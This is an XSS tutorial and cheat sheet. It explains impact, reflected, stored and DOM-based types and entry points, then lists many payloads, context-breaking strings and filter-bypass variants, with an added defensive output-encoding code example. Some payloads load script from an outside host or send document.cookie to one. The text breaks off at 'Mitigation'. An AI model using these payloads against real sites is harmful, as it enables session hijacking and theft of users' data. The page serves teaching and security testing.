XSS

XSS (Cross-Site Scripting) is a client-side code injection attack in which an attacker gets malicious script to execute in a victim's web browser.

Impact

  • Account Hijacking: Attackers can steal session cookies and take over the victim's session. If the victim is an administrator, this gives the attacker administrative access.

  • Credential Theft: Theft of credentials such as passwords via an injected clone of the login page.

  • Data Leakage: Personally identifiable information (PII) such as credit card number, SSN, or any data stored in the browser could be accessed.

  • Redirecting to malicious web pages, keylogging, and delivering malware.

  • Accessing geolocation, webcam, microphone, and files on the system (subject to the browser's permission prompts).

There are three types of XSS:

  • Reflected (Non-persistent)

  • Stored (Persistent)

  • DOM-based

Reflected (Non-Persistent)

The payload is part of the request sent to the server and is reflected back, unencoded, in the response.

For example, a website's dashboard greets the user by their username. If the username is not sanitized or encoded properly before being written into the page, it can execute JavaScript.

Stored (Persistent)

The payload submitted to the web application is stored on the server and executes whenever it is rendered elsewhere, for every user who views the affected page.

For example, a payload saved as a comment on a page executes each time the comments are loaded.

DOM-based

Client-side JavaScript writes attacker-controlled data into the DOM, so the malicious code executes without the server ever handling it. This is a more advanced attack because the payload never reaches server-side filters or WAFs and executes entirely on the client side.

For example, a page that calls "document.write(document.URL)" writes the current URL into the page unencoded, so a payload placed in the URL is executed.

Entry Points

Any user-controlled parameter such as:

  • Input fields

  • HTTP headers such as Host and Referer

  • URL redirection

  • URI parameters

  • File uploads (the file name)

Payloads

<script>alert(1)</script>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<iframe src="javascript:alert(1)">
<embed src=//14.rs>
<details ontoggle=alert(1) open>test</details>
<xss onclick="alert(1)" style=display:block>test</xss>
<xss draggable="true" ondragstart="alert(1)" style=display:block>test</xss>
<script>onerror=alert;throw 1</script>

Polyglots:
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`

Context Breaking

HTML Context

Case: <tag> Searched for $input </tag>

<svg onload=alert()>
</tag><svg onload=alert()>

Attribute Context

Case: <tag attribute="$input">

"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()

JavaScript Context

Case: <script> var something = '$input'; </script>

'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
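As an added example (not part of the original page), the following JavaScript shows context-aware output encoding for the three cases above, alongside a naive sanitiser that only strips angle brackets, and a check that the page's break-out payloads no longer escape their context. The encoder, template and check function names are my own.

```javascript
// Added example, not from the original page: context-aware output encoding for the
// three "Context Breaking" cases, plus a naive angle-bracket stripper to show why
// the attribute and JS cases are not covered by HTML-body encoding alone.

// HTML body context: <tag> Searched for $input </tag>
function encodeForHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Quoted attribute context: <tag attribute="$input"> (encode every non-alphanumeric)
function encodeForAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    c => "&#x" + c.charCodeAt(0).toString(16).toUpperCase() + ";");
}

// JS string context: <script> var something = '$input'; </script>
// \uXXXX escapes stay inside the string literal and are never seen by the HTML parser.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    c => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Weak sanitiser often seen in the wild: removes only < and >.
function naiveStripAngles(s) {
  return String(s).replace(/[<>]/g, "");
}

// Templates mirroring the page's three cases; enc is the encoder applied to $input.
function renderHtml(input, enc = encodeForHtml) {
  return "<p>Searched for " + enc(input) + "</p>";
}
function renderAttribute(input, enc = encodeForAttribute) {
  return '<input value="' + enc(input) + '">';
}
function renderJs(input, enc = encodeForJsString) {
  return "<script>var something = '" + enc(input) + "';</script>";
}

// Break-out checks on the rendered markup: each template contributes a fixed
// number of delimiters, so any extra one means $input escaped its context.
const count = (s, re) => (s.match(re) || []).length;
function htmlBrokeOut(r) { return count(r, /</g) !== 2; }                 // <p> and </p>
function attributeBrokeOut(r) { return count(r, /"/g) !== 2; }            // the value's two quotes
function jsBrokeOut(r) { return count(r, /'/g) !== 2 || count(r, /<\/script/gi) !== 1; }
// The page's attribute payload through the weak and the correct encoder.
const attrPayload = '" onmouseover=alert() "';
console.log(attributeBrokeOut(renderAttribute(attrPayload, naiveStripAngles))); // true
console.log(attributeBrokeOut(renderAttribute(attrPayload)));                   // false
```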

Bypassing

Without Event Handlers

<object data=javascript:confirm()>
<a href=javascript:confirm()>click here
<script src=//14.rs></script>
<script>confirm()</script>

Without Space

<svg/onload=confirm()>
<iframe/src=javascript:alert(1)>

Without Slash (/)

<svg onload=confirm()>
<img src=x onerror=confirm()>

Without closing angle bracket (>)

<svg onload=confirm()//
<svg onload=alert(1)<!--

Without alert, confirm, prompt

<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>

Without a Valid HTML tag

<x onclick=confirm()>click here
<x ondrag=confirm()>drag it

Mitigation

  • L
